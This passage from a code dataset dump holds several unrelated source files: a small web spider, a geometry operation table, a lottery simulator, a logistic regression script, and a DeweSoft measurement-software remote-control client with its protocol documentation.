val\n","sub_path":"util/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"167517023","text":"from TinyScrapy.tinyScrapy import Request\n\n\nclass BaiduSpider(object):\n def start_requests(self):\n start_urls = [\n 'https://blog.csdn.net/weixin_37947156/article/details/74435304',\n 'https://www.baidu.com/',\n 'https://blog.csdn.net/weixin_37947156/article/list/3',\n ]\n\n for url in start_urls:\n yield Request(url=url, callback=self.parse)\n\n def parse(self, response):\n print(response.request.url, '!!!!')\n yield Request(url='https://pagespeed.v2ex.com/go/cv?p=1', callback=self.parse2)\n yield Request(url='https://www.bilibili.com/', callback=self.parse2)\n\n def parse2(self, response):\n print(response.request.url, '@@@@@@@@@@')\n","sub_path":"TinyScrapy/spider/baiduSpider.py","file_name":"baiduSpider.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"345569191","text":"\"\"\"Point Structure.\"\"\"\nfrom rules.drawable import *\nlineADT = {\n parent:tuple(),\n \"new\":{\n tuple():{\n args:tuple(),\n trgt:Line.default\n },\n (str,):{\n args:(\"parallelAxis\",),\n trgt:Line.default\n },\n (Point,Point,):{\n args:(\"point1\",\"point2\"),\n trgt:Line.fromPoints,\n },\n (float,float,Point,):{\n 
args:(\"angle\",\"length\",\"point\",),\n trgt:Line.fromMetrics,\n },\n retVal:Point\n },\n \"copy\":{\n tuple():{\n args:tuple(),\n trgt:Line.fromLine\n },\n retVal:Line\n },\n \"angle\":{\n tuple():{\n args:tuple(),\n trgt:Line.angle\n },\n retVal:float\n },\n \"length\":{\n tuple():{\n args:tuple(),\n trgt:Line.length\n },\n retVal:float\n },\n \"distance\":{\n (Line,):{\n args:(\"line\",),\n trgt:Line.distanceFrom\n },\n (Point,):{\n args:(\"point\",),\n trgt:Line.distanceFrom\n },\n retVal:float\n },\n \"bisector\":{\n tuple():{\n args:tuple(),\n trgt:Line.bisector\n },\n retVal:Point\n },\n \"sector\":{\n (float, float,):{\n args:(\"m\", \"n\",),\n trgt:Line.sector\n },\n retVal:Point\n },\n \"intersect\":{\n (Line,):{\n args:(\"line\",),\n trgt:Line.intersectionWith\n },\n retVal:Point\n },\n \"parallel_line\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.parallelLine\n },\n (float,):{\n args:(\"distance\",),\n trgt:Line.parallelLine\n },\n retVal:Point\n },\n \"projection\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.projectionOf\n },\n retVal:Point\n },\n \"perpendicular\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.perpendicularFrom\n },\n (float,):{\n args:(\"ratio\",),\n trgt:Line.perpendicularAt\n },\n retVal:Line\n },\n \"perpendicular_bisector\":{\n tuple():{\n args:tuple(),\n trgt:Line.perpendicularBisector\n },\n retVal:Line\n },\n \"triangle\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.triangleTo\n },\n retVal:Triangle\n },\n \"circle\":{\n tuple():{\n args:tuple(),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"tangent_circle\":{\n (Point,):{\n args:(\"tangentCentre\",),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"chord_circle\":{\n (Point,):{\n args:(\"chordCentre\",),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"square\":{\n tuple():{\n args:tuple(),\n trgt:Line.square\n },\n retVal:int\n },\n \"rectangle\":{\n (float,):{\n args:(\"sideLength\",),\n trgt:Line.rectangle\n },\n retVal:int\n }\n}","sub_path":"rules/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"123485501","text":"import random\n \n\n\ndef lottoarvonta():\n numerot = list(range(1,41))\n lottorivi = random.sample(numerot, 7)\n for i in lottorivi:\n numerot.remove(i)\n lisanumerot = random.sample(numerot, 3) \n return lottorivi,lisanumerot\n\ndef pelaa():\n omarivi = lottoarvonta()\n lottorivi = omarivi[0]\n lisanumerot = omarivi[1]\n return lottorivi, lisanumerot\n\ndef tarkista(arvonta, rivi):\n oikeat = arvonta\n omarivi = rivi\n normirivitulos = []\n lisarivi=[]\n for i in omarivi[0]:\n if i in oikeat[0]:\n normirivitulos.append(i)\n for i in omarivi[1]:\n if i in oikeat[1]:\n lisarivi.append(i) \n print(len(normirivitulos) , \"oikein\", normirivitulos, \"ja\",len(lisarivi), \"lisänumeroa\" , lisarivi)\n #print(oikeat, omarivi)\n\n\narvonta = lottoarvonta()\nprint('Oikea rivi:', end = ' ')\nprint(*arvonta[0], sep = ', ') # näinkin voi tehdä!\nprint('Lisänumerot:', end = ' ')\nprint(*arvonta[1], sep = ', ') \nrivi = pelaa() \nprint('Rivi:', end=' ')\nprint(*rivi[0], sep = ', ')\nprint('Lisänumerot:', end = ' ')\nprint(*rivi[1], sep = ', ') \ntarkista(arvonta, rivi) ","sub_path":"Python/Pythontehtavat/03 Tietorakenteita ja luokkia/lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"563915273","text":"# This 
program will execute the optimal comparison, scikit-learn's \n# implementation of logistic regression, on our same datasets.\n# This will give us an idea about what kind of accuracy might be possible.\n\nfrom sklearn.linear_model import LogisticRegression as lr\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score\nfrom csv import reader\nfrom typing import List, Tuple\nimport numpy as np\n\n## Read in and store the data\nheader = None\ndef get_data(filename:str) -> Tuple[List,List[int]]:\n global header\n filepath = \"decision-tree/data/\" + filename + \".csv\"\n with open(filepath, 'r') as read_obj:\n # pass the file object to reader() to get a reader object, and\n # pass the reader object to list() to get a list of lists.\n df = list(reader(read_obj))\n # save and remove the header\n header = df[0]\n del df[0]\n\n # define X (training samples) and Y (labels)\n X = df\n Y = []\n for line in X:\n # add the target to Y\n Y.append(line[len(line)-1])\n # remove the target from X_train\n del line[len(line)-1]\n # remove the first var as well (the useless index)\n del line[0]\n # reflect the var removal in the header\n del header[0]\n return np.array(X).astype(np.float64), np.array(Y).astype(np.float64)\n\n# main ------\nX_train, Y_train = get_data(\"ks_train_full_cat\")\nX_val, Y_val = get_data(\"ks_validate_full_cat\")\nX_test, Y_test = get_data(\"ks_test_full_cat\")\n\n#X_train, Y_train = get_data(\"ks_train_full\")\n#X_val, Y_val = get_data(\"ks_validate_full\")\n#X_test, Y_test = get_data(\"ks_test_full\")\n\n# define the classifier w/ our training data\n# do a grid search to find best model\nclf = lr(random_state=5, C= .001)\n#param_grid = {'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000] }\n#search = GridSearchCV(clf, param_grid, cv=5)\nclf = clf.fit(X_train, Y_train)\n\n#best = clf.best_estimator_\nbest = clf\n\nprint(\"Model Parameters\")\nprint(best.get_params())\n\n# use the model for probabilistic prediction\nY_pred_train = best.predict(X_train)\nY_pred_val = best.predict(X_val)\n\n# Returns number of accurate predictions\naccuracy_train = accuracy_score(Y_train, Y_pred_train)\naccuracy_val = accuracy_score(Y_val, Y_pred_val)\n\nprint(\"Training Accuracy: \" + str(accuracy_train))\nprint(\"Validation Accuracy: \" + str(accuracy_val))\n\n# # create a new dataset of both the training and validation data\nX_tv = np.concatenate( (X_train, X_val))\nY_tv = np.concatenate((Y_train, Y_val))\n\n# define the classifier\nclf = clf.fit(X_tv, Y_tv)\n\n# probabilistic prediction\nY_test = clf.predict(X_tv)\n\naccuracy_test = accuracy_score(Y_tv, Y_test)\n\nprint(\"Testing Accuracy: \" + str(accuracy_test))\n","sub_path":"logistic-regression/optimal-lr.py","file_name":"optimal-lr.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41976556","text":"\"\"\"\nCopyright (c) 2018, Austrian Institute of Technology\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this\nlist of conditions and the following disclaimer in the documentation and/or\nother materials provided with the distribution.\n\nNeither the names of the Austrian Institute of Technology nor 
the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\nANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\"\"\"DeweNetControllerClient module for remote control purposes of the DeweSoft\n\nThis module implements the remote control for the communication with the\nDeweSoft measurement software. Therefore the class DeweNetControllerClient is\nused. This module also implements the used exceptions.\n\n\nCommand reference (DEWESoft NET protocol version 4) from DeweSoft Net Interface\nManual\n\nEach command has to have New line suffix (0x13 + 0x10). Commands in brackets\ncan only be sent in control mode.\n\n+-------------------+----------------------------------------------------------+\n| Command | Description |\n+===================+==========================================================+\n| GETVERSION | returns DEWESoft version |\n+-------------------+----------------------------------------------------------+\n| GETINTFVERSION | returns DEWESoft NET protocol version |\n+-------------------+----------------------------------------------------------+\n| GETDATETIME | returns current time on measurement unit |\n+-------------------+----------------------------------------------------------+\n| GETMODE | returns current operation mode (control or view) |\n+-------------------+----------------------------------------------------------+\n| SETMODE mode | sets operation mode; |\n| +-------------------+--------------------------------------+\n| | mode parameter: | 0 - view mode |\n| | +--------------------------------------+\n| | | 1 - control mode |\n+-------------------+-----------------------+----------------------------------+\n| SETMASTERMODE mode| sets clock mode of the devices, used for synchronize |\n| | several devices at the same time |\n| +-------------------+--------------------------------------+\n| | mode parameter: | 0 - standalone (if only one system is|\n| | | used |\n| | | 1 - clock master system (clock is |\n| | | output from this system to the |\n| | | slaves - only one!) 
|\n| | | 2 - clock slave mode (clock will be |\n| | | received from a master system) |\n+-------------------+-------------------+--------------------------------------+\n| SETSAMPLERATE | sets sampling rate |\n| samplerate +---------------------+------------------------------------+\n| | samplerate parameter| sample rate in Hz |\n+-------------------+---------------------+------------------------------------+\n| GETSAMPLERATE | reads current sample rate |\n+-------------------+----------------------------------------------------------+\n| LISTUSEDCHS | lists all used channels |\n+-------------------+----------------------------------------------------------+\n| PREPARETRANSFER | sends a list of channels for live capture. Channels can |\n| | only be selected from used channel syntax: |\n| | |\n| | :: |\n| | |\n| | /stx preparetransfer |\n| | ch 0 |\n| | . |\n| | . |\n| | ch x |\n| | /etx |\n| | |\n+-------------------+----------------------------------------------------------+\n| STARTTRANSFER | requests DEWESoft to connect to port 'portno' and feed |\n| portno filename | data to client |\n| +---------------------+------------------------------------+\n| | portno parameter: | TCP port number on client computer |\n+-------------------+---------------------+------------------------------------+\n| STOPTRANSFER | stops transfer |\n+-------------------+----------------------------------------------------------+\n| STARTTRIGTRANSFER | requests DEWESoft to connect to port 'portno' and feed |\n| portno | last trigger data to client |\n| +---------------------+------------------------------------+\n| | portno parameter: | TCP port number on client computer |\n+-------------------+---------------------+------------------------------------+\n| STARTACQ | start acquisition - measure (more suitable name would be |\n| | STARTMEASURE) |\n+-------------------+----------------------------------------------------------+\n| STOP |stop acquisition / leave setup mode and go to start screen|\n+-------------------+----------------------------------------------------------+\n| STARTSTORE | starts storing, also starts acquisition if not yet |\n| filename | started |\n+-------------------+----------------------------------------------------------+\n| SETSTORING status | sets storing on or off on measurement unit |\n| +---------------------+------------------------------------+\n| | status parameter: | ON - remote storing on |\n| + +------------------------------------+\n| | | OFF - remote storing off |\n+-------------------+---------------------+------------------------------------+\n| ENTERSETUP | enter setup mode / start acquisiton in setup mode |\n+-------------------+----------------------------------------------------------+\n| ISACQUIRING | returns 'Yes' if acquisition is in progress (measure or |\n| | setup), otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| ISSETUPMODE | returns 'Yes' if in setup mode, otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| ISSTORING |returns 'Yes' if in storing is in progress, otherwise 'No'|\n+-------------------+----------------------------------------------------------+\n| ISMEASURING | returns 'Yes' if acquisition is in progress (measure), |\n| | otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| GETSTATUS |returns DEWESoft status (measure/analyse mode, clock 
mode)|\n+-------------------+----------------------------------------------------------+\n| SETFULLSCREEN | sets or clears full screen mode of DEWESoft |\n| status +---------------------+------------------------------------+\n| | status parameter: | 1 - full screen on |\n| + +------------------------------------+\n| | | 0 - full screen off |\n+-------------------+---------------------+------------------------------------+\n| SETUP CONNECT | sets DEWESoft to full screen setup mode. |\n| | Suitable for VNC remote setup of DEWESoft |\n+-------------------+----------------------------------------------------------+\n| SETUP DISCONNECT | cancels setup full screen mode |\n+-------------------+----------------------------------------------------------+\n| DISPLAY START | sets DEWESoft to full screen display setup mode. |\n| | Suitable for VNC remote setup of DEWESoft displays |\n+-------------------+----------------------------------------------------------+\n| DISPLAY STOP | cancels display setup mode |\n+-------------------+----------------------------------------------------------+\n| LOADSETUP filename| loads a setup; filename parameter: setup file stored on |\n| | measurement unit |\n+-------------------+----------------------------------------------------------+\n| SAVESETUP filename| saves a setup; filename parameter: setup file to be |\n| | stored on measurement unit |\n+-------------------+----------------------------------------------------------+\n| NEWSETUP | clears current DEWESoft setup |\n+-------------------+----------------------------------------------------------+\n| SETSCREENSIZE | sets DEWESoft window size in pixels |\n| screensize +-----------------------+----------------------------------+\n| | screensize parameter: | XsizexYSize - sets window size to|\n| | | Xsize x Ysize (i.e. 640x480) |\n| +-----------------------+----------------------------------+\n| | | max - maximizes window size |\n+-------------------+-----------------------+----------------------------------+\n\nTODO implement automatic start of DeweSoft instance\n If the DeweSoft instance isn't already started and no process is running,\n than automatically start the DeweSoft using an absolute start path.\n\"\"\"\n\n\nfrom io import StringIO\nimport logging\nimport socket\n\nfrom datetime import datetime\n\nfrom .dewenet_data import DeweChannelInfo\n\n\ndef dt_now():\n \"\"\"Helper method for getting the timestamp\n\n Will be necessary for testing\n\n Returns:\n datetime: current time\n \"\"\"\n return datetime.now()\n\n\nclass DeweNetClientException(Exception):\n \"\"\"Base exception raised for errors in the DeweNetClient module\"\"\"\n\n def __init__(self, *args, **kwargs):\n Exception.__init__(self, *args, **kwargs)\n\n\nclass DeweNetControllerClient(object):\n \"\"\"Client for Communication with DeweSoft.\n\n The DeweNetControllerClient class implements the necessary functionality\n for controlling the DeweSoft. 
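On the wire, each command in the reference table above is a plain
ASCII line terminated with CRLF, and DeweSoft answers with a '+OK'
line, a '+STX'/'+ETX'-framed multiline block, or an error line. As a
minimal sketch of that raw exchange, independent of this class (the
host and port are assumptions; a DEWESoft NET slave must already be
listening there):

 ::

     import socket

     sock = socket.create_connection(("127.0.0.1", 8999))  # assumed endpoint
     print(sock.recv(1024))           # greeting, e.g. b'+CONNECTED ...'
     sock.sendall(b"GETVERSION\r\n")  # every request ends with CRLF
     print(sock.recv(1024))           # single-line reply, e.g. b'+OK ...'
     sock.close()
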
To use it, the NET plugin for DeweSoft must be\n registered and the Slave Mode of the DeweSoft program must be activated\n (Settings-Hardware Setup-NET-Computer role in NETwork -> Slave measurement\n unit).\n\n The class uses a TCP client that connects to an open port of the DeweSoft\n (usually 8999).\n\n Example:\n\n ::\n\n deweController = DeweNetControllerClient()\n deweController.connect_to_dewe('127.0.0.1', 8999)\n\n print(\"GetSampleRate\", deweController.dewe_get_samplerate())\n print(\"IsAcquiring\", deweController.dewe_is_acquiring())\n print(\"GetMode\", deweController.dewe_get_mode())\n deweController.dewe_load_setupfile(\n \"C:\\\\DATA\\\\Cotevos\\\\EVTestStand\\\\EvTestStand.d7s\")\n deweController.dewe_list_used_channels()\n deweController.dewe_start_acquisition()\n time.sleep(10)\n deweController.dewe_stop()\n deweController.disconnect_from_dewe()\n\n\n Attributes:\n EXP_INTF_VERSION (int): Definition of the implemented protocol\n version. If other revisions are used, please check the\n communication flow for changes.\n\n _socket (socket): The TCP client socket for communication with the TCP\n server of the DeweSoft slave device\n\n available_channels (dict): After loading a setup file of the DeweSoft\n (function dewe_load_setupfile()) the channels can be read from\n DeweSoft by using dewe_list_used_channels().\n This dictionary maps each channel name to a 'DeweChannelInfo'\n object, in which the different settings of the channel are stored\n (see DeweChannelInfo documentation)\n \"\"\"\n\n EXP_INTF_VERSION = 31\n \"\"\"Interface version that is used during development.\n\n The client is tested against this protocol version.\n \"\"\"\n\n def __init__(self, client_socket=None, logger=None):\n \"\"\"Default constructor\n\n Args:\n client_socket (socket.socket, optional): Socket for connecting to\n DeweSoft (usually a TCP socket)\n logger (logging.Logger, optional): Sets the logger\n \"\"\"\n self._logger = logger or logging.getLogger(__name__)\n self._socket = client_socket or socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n self.available_channels = dict()\n self._logger.debug(\"Initialize DeweNetController Client\")\n\n def connect_to_dewe(self, dewe_ip='127.0.0.1', dewe_port=8999):\n \"\"\"Connect to the DeweSoft Net interface\n\n The function must be called after creation of the\n DeweNetControllerClient. 
It will connect to a running instance of\n DeweSoft on the host computer and read the interface version and the\n version of the DeweSoft.\n\n Args:\n dewe_ip (str, optional): IP address of the computer with running\n DeweSoft\n dewe_port (int, optional): Open port of the DeweSoft client,\n usually 8999\n\n Returns:\n list: dewe_interface_version, dewe_version\n dewe_interface_version (int): version of the Dewe-Net interface\n dewe_version (str): version of the connected DeweSoft instance\n\n Raises:\n DeweNetClientException: If an error occurs during communication.\n \"\"\"\n\n self._logger.info(\"Connect to DeweSoft at {}: {}\".format(dewe_ip,\n dewe_port))\n dewe_ip = dewe_ip.encode(\"ascii\")\n self._socket.connect((dewe_ip, dewe_port))\n\n # get first response after successful connection\n con_respmsg = self._dewe_read_response()[0]\n self._logger.debug(\"Response: '{}'\".format(con_respmsg))\n\n if con_respmsg.startswith(\"+CONNECTED\"):\n self._logger.info(\"Connection successfully opened.\")\n else:\n raise DeweNetClientException(\n \"connect_to_dewe\",\n \"Unknown response received from DeweSoft: \" + con_respmsg)\n\n dewe_interface_version = self._dewe_read_interface_version()\n dewe_version = self._dewe_read_version()\n self._logger.info(\"Interface Version: {} Version: {}\".format(\n dewe_interface_version, dewe_version))\n return dewe_interface_version, dewe_version\n\n def _dewe_read_interface_version(self):\n \"\"\"Read the interface version of the connected DeweSoft.\n\n This helper function reads the interface version of the connected\n DeweSoft and stores the value in the attribute\n '_dewe_interface_version'.\n\n Returns:\n int: interface version read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error occurs during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETINTFVERSION\")[0]\n\n if response.startswith(\"+OK\"):\n intf_version = int(response.replace(\"+OK \", \"\"))\n\n if intf_version != DeweNetControllerClient.EXP_INTF_VERSION:\n self._logger.warning(\n \"Used Interface with Version '{0}'\"\n \" doesn't match expected one '{1}'.\".format(\n intf_version,\n DeweNetControllerClient.EXP_INTF_VERSION))\n else:\n self._logger.debug(\n \"Used Interface with Version '{0}' matches expected one \"\n \"'{1}'.\".format(\n intf_version,\n DeweNetControllerClient.EXP_INTF_VERSION))\n\n return intf_version\n\n else:\n raise DeweNetClientException(\n \"dewe_read_interface_version\",\n \"Error reading interface version: '{}'\".format(response))\n\n def _dewe_read_version(self):\n \"\"\"Read the version of the connected DeweSoft\n\n This helper function reads the version of the connected DeweSoft and\n stores the value in the attribute '_dewe_version'.\n\n Returns:\n str: Version string read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error occurs during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETVERSION\")[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_read_version\",\n \"Error reading version: '{}'\".format(response))\n\n return response.replace(\"+OK \", \"\")\n\n def disconnect_from_dewe(self):\n \"\"\"Closes the connection to the DeweSoft\n\n \"\"\"\n self._logger.info(\"Close DeweNetControllerClient\")\n self._socket.close()\n\n def dewe_get_datetime(self):\n \"\"\"Read the current time on the measurement device\n\n Returns:\n datetime: Current datetime read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error occurs 
during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETDATETIME\")[0]\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"_dewe_get_dateTime: Can't \"\n \"convert received message to datetime\", response)\n\n response = response.replace(\"+OK\", \"\").strip()\n return datetime.strptime(response, \"%d.%m.%Y %H:%M:%S\")\n\n def dewe_set_mode(self, mode=False):\n \"\"\"Sets the operation mode of the DeweSoft\n\n Args:\n mode (bool,optional): Mode of the DeweSoft\n False - Set to View Mode\n True - Set to Control Mode\n\n Returns:\n bool: True - DeweSoft is in control mode\n False - DeweSoft is in view mode\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n comm_mode = 1 if mode else 0 # generate argument for request\n\n response = self._dewe_request_control_message(\n \"SETMODE \" + str(comm_mode))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n return mode\n\n def dewe_get_mode(self):\n \"\"\"Read the current mode of the DeweSoft.\n\n Returns:\n bool: True - DeweSoft is in control mode\n False - DeweSoft is in view mode\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETMODE\")[0]\n\n if response.startswith(\"+OK\"):\n response = response.split(\" \")\n return int(response[2]) == 1\n\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_start_acquisition(self):\n \"\"\"Start the acquisition (measurement) on the DeweSoft\n\n Returns:\n time: current time of measurement start\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\"STARTACQ\")[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_start_store(self, filename):\n \"\"\"Start the storing function and the acquisition (if not already\n running) on the DeweSoft\n\n Args:\n filename (str): Filename and path of the storage file on local\n DeweSoft\n\n Returns:\n time: current time of measurement start\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\n \"STARTSTORE \" + filename)[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error starting storage on DeweSoft: '{}'\".format(response))\n\n def dewe_set_storing(self, storing=True):\n \"\"\"Start storing mode of the DeweSoft\n\n Sets the Mode for the control option of the DEWE connection\n\n Args:\n storing (bool): False - Not storing\n True - Store\n\n Returns:\n bool: mode of storing\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n comm_storing = \"ON\" if storing else \"OFF\"\n\n response = self._dewe_request_control_message(\n \"SETSTORING \" + comm_storing)[0]\n\n if response.startswith(\"+OK\"):\n return storing\n else:\n raise 
DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_stop(self):\n \"\"\"Stop the acquisition (measurement) and/or storing on the DeweSoft\n\n Returns:\n time: current time of measurement start\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\"STOP\")[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_is_acquiring(self):\n \"\"\"Get actual state of acquisition\n\n Returns:\n bool: True, if DeweSoft is in acquisition mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISACQUIRING\")\n\n def dewe_is_setup_mode(self):\n \"\"\"Get actual state of setup mode\n\n Returns:\n bool: True, if DeweSoft is in setup mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISSETUPMODE\")\n\n def dewe_is_storing(self):\n \"\"\"Get actual state of storing\n\n Returns:\n bool: True, if DeweSoft is in storing mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISSTORING\")\n\n def dewe_is_measuring(self):\n \"\"\"Get actual state of acquisition\n\n Returns:\n bool: True, if DeweSoft is in acquisition mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISMEASURING\")\n\n def dewe_get_status(self):\n \"\"\"Get actual status of DeweSOft\n\n Returns:\n str: State information of DeweSoft (e.g. 
Response Mode: Measure,\n Acquiring; Clock mode: Standalone)\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETSTATUS\")[0]\n if response.startswith(\"+OK\"):\n return response.replace(\"+OK\", \"\").strip()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_load_setupfile(self, filename):\n \"\"\"Loads a setup file stored on the DeweSoft computer\n\n Args:\n filename (str): Full Filename with path of the setup file to be\n loaded\n Returns:\n str: Response from DeweSoft\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\n \"LOADSETUP \" + filename)[0]\n if response.startswith(\"+OK\"):\n return response.replace(\"+OK\", \"\").strip()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n def dewe_set_samplerate(self, samplefrequency = None):\n \"\"\"Writes the sample rate of the DeweS\n oft\n\n Returns:\n int: Sample Rate of DeweSoft in Hz\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if samplefrequency:\n response = self._dewe_request_control_message(\n \"SETSAMPLERATE \" + str(samplefrequency))[0]\n #response = self._dewe_request_control_message(\"GETSAMPLERATE\")[0]\n if response.startswith(\"+OK\"):\n self._logger.info(response)\n response = response.replace(\"+OK\", \"\").strip()\n self._logger.info(response)\n response = response[response.find('<') + 1:response.find('>')]\n self._logger.info(response)\n return int(response)\n\n else:\n self._logger.info(response)\n raise DeweNetClientException(\n \"dewe_set_samplerate\",\n \"Can't set samplerate from DeweSoft: '{}'\".format(response))\n else:\n return None\n\n\n\n def dewe_get_samplerate(self):\n \"\"\"Read the actual sample rate of the DeweSoft\n\n Returns:\n int: Sample Rate of DeweSoft in Hz\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETSAMPLERATE\")[0]\n if response.startswith(\"+OK\"):\n return int(response.replace(\"+OK\", \"\").strip())\n else:\n raise DeweNetClientException(\n \"dewe_get_samplerate\",\n \"Can't read samplerate from DeweSoft: '{}'\".format(response))\n\n def dewe_list_used_channels(self):\n \"\"\"Read all available channels from DeweSoft with its parameters\n\n This function reads all available channels from the DeweSoft and stores\n it in the available_channels list. Then it is possible to get these\n values for further work. 
(using client.available_channels.keys())\n \"\"\"\n response = self._dewe_request_control_message(\"LISTUSEDCHS\")\n\n for line in response:\n element = line.split(\"\\t\")\n\n if len(element) > 22:\n channel = DeweChannelInfo(channel_number=element[2],\n name=element[3],\n unit=element[5],\n samplerate_divider=element[6],\n measurement_type=element[8],\n sample_data_type=element[9],\n buffer_size=element[10],\n custom_scale=element[11],\n custom_offset=element[12],\n scale_raw_data=element[13],\n offset_raw_data=element[14],\n description=element[15],\n settings=element[16] + \" \" + element[19],\n range_min=element[17],\n range_max=element[18],\n value_min=element[21],\n value_max=element[22],\n value_act=(element[23]\n if len(element) > 23 else 0.0))\n self.available_channels[channel.name] = channel\n elif len(element) > 18:\n\n channel = DeweChannelInfo(channel_number=element[2],\n name=element[3],\n unit=element[5],\n samplerate_divider=element[6],\n measurement_type=element[8],\n sample_data_type=element[9],\n buffer_size=element[10],\n custom_scale=element[11],\n custom_offset=element[12],\n scale_raw_data=element[13],\n offset_raw_data=element[14],\n description=element[15],\n settings=element[16] + \" \" + element[19],\n range_min=element[17],\n range_max=element[18],\n value_min=0.0,\n value_max=0.0,\n value_act=0.0)\n self.available_channels[channel.name] = channel\n else:\n raise DeweNetClientException(\n \"Error reading channel\",\n \"Channel 